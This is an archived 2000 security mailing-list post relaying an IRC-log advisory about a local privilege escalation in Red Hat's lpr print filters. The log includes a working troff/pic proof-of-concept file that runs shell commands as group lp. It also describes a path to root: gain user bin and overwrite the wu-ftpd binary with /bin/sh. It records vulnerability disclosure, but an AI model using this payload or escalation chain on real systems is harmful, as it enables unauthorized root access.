Date: Thu, 26 Oct 2000 15:14:41 -0600 From: Kurt Seifried <seifried@SECURITYPORTAL.COM> Subject: LSLID:2000102605 - lpr To: LINUX-SECURITY@LISTSERV.SECURITYPORTAL.COM LSLID:2000102605 ================== details of an exploit agains lpr-0.50-4 (at least) (also affects other systems that may have the same print filters) URL : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt AFFECTS : lpr-0.50-4 & earlier SEVERITY : local ROOT possible. SYNOPSIS : escalation of group permissions, leading to exploit for every user except root is available. root is sometimes available as well. (wu-ftpd-2.6.0-14.6x binaries are owned by user bin, and can be overwritten allowing root access if wu-ftpd is installed.) http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt This is a log of an advisory given in channel #roothat on irc.pulltheplug.com, October 16 2000. !!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!! --> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat --- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer printer and j00 get a new group of friends. and stuff. --- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000 --- noid gives channel operator status to zen-parse <bdev> hey zen <Safety> zen-parse <Safety> lockdown <zen-parse> lo all <bdev> what's this topic all about then zen? <zen-parse> new hole in lpr package for redhat <bdev> and... <bdev> ;] <bdev> you releasing it ? --> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat <zen-parse> [zen@continuity /tmp]$ id <zen-parse> uid=500(zen) gid=500(zen) groups=500(zen) <zen-parse> [zen@continuity /tmp]$ cat asdf <zen-parse> .PS <zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD <zen-parse> .PF <zen-parse> [zen@continuity /tmp]$ lpr asdf <zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetany ideasyet <zen-parse> uid=500(zen) gid=500(zen) groups=7(lp) <zen-parse> [zen@continuity /tmp]$ <zen-parse> consider it released <zen-parse> erm... missing a line... <bdev> heh <zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideas yet <zen-parse> -rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougeta nyideasyet <zen-parse> as the output <bdev> only gid lp ? <Remmy> ehm <Remmy> heh <bdev> but: -r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr * <-- schematic|ZzZz has quit (Ping timeout) <zen-parse> thats not where the magic happens though. <zen-parse> ;] <zen-parse> needs a running lpd <zen-parse> and a printer that does troff <zen-parse> eg: PostScript <zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi <Remmy> zen...write a bugtraq advisory <Remmy> but get really really stoned first. <Remmy> hehe <zen-parse> `grog -Tps -msafer $TMP_FILE` <zen-parse> log this... use this as an advisory. ;] <zen-parse> that is where the magic happens. <zen-parse> grog is a perl script that selects the correct command line options for groff. groff can, if asked run a variety of other programs, such as eqn(fo r equations) tbl(for tables) and pic(for compiling pictures). <zen-parse> the -msafer means to disallow the call to any dangerous functions, such as executing a command or creating or modifying a file. <zen-parse> However pic is called without that option being passed, even though it does have a -S switch, which runs it in safer mode. <possem> zen-parse <zen-parse> The lpd checks what type of file the file is <zen-parse> with a program called file <bdev> hmm <Remmy> looks perty yummy <zen-parse> the type of this file is troff or preprocessor... <-- possem has quit (Quit: ) <zen-parse> so the daemon then it hands it to the apropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi <zen-parse> which contains the grog command, which causes groff to run pic on t he file, and pic executes the file we speciify as the user the file was printed by. <zen-parse> with one exception. <zen-parse> you have been set to have a list of groups which just contains one group. lp <Remmy> hmm <zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd ca n run the commands as any user (except root). <zen-parse> however, if u have wuftpd installed, there is a root exploit. <zen-parse> -rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in .ftpd <zen-parse> lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu .ftpd -> in.ftpd <zen-parse> gain user bin, and copy /bin/sh over in.ftpd <Remmy> heh <zen-parse> telnet to port 21, and you have root. so it is a root exploit on sy stems with wufptd. and just every other uid on systems with lpd runnning. <zen-parse> ) <bdev> heh, nice <zen-parse> there also appears to be an error file attempting to be made just a fter priviledges are dropped, but it has insuficient writes at that moment to a ctually succeed. the directory is owned by root, and only has lp write access b ecause the lpd runs as root. <zen-parse> um. you dats my advisory ;] --- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D <zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|a fk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D <Remmy> ew <zen-parse> -- zen-parse ;] <Remmy> hehe <Remmy> i lik eyer bigtraq posts better... <Remmy> ya get all the leeto ascii in there and all... <zen-parse> ok... now ima save the buffer and submit it to bugtraq ;] <bdev> kewl --> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat <bdev> that'd be a cool advisory !!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!! Ob-ASCII /\/\ mee-errraaAAgghhhraher! = oo = / \()/ / / __ \ || || in memory of lucky. Send someone a cool Dynamitemail flashcard greeting!! And get rewarded. GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41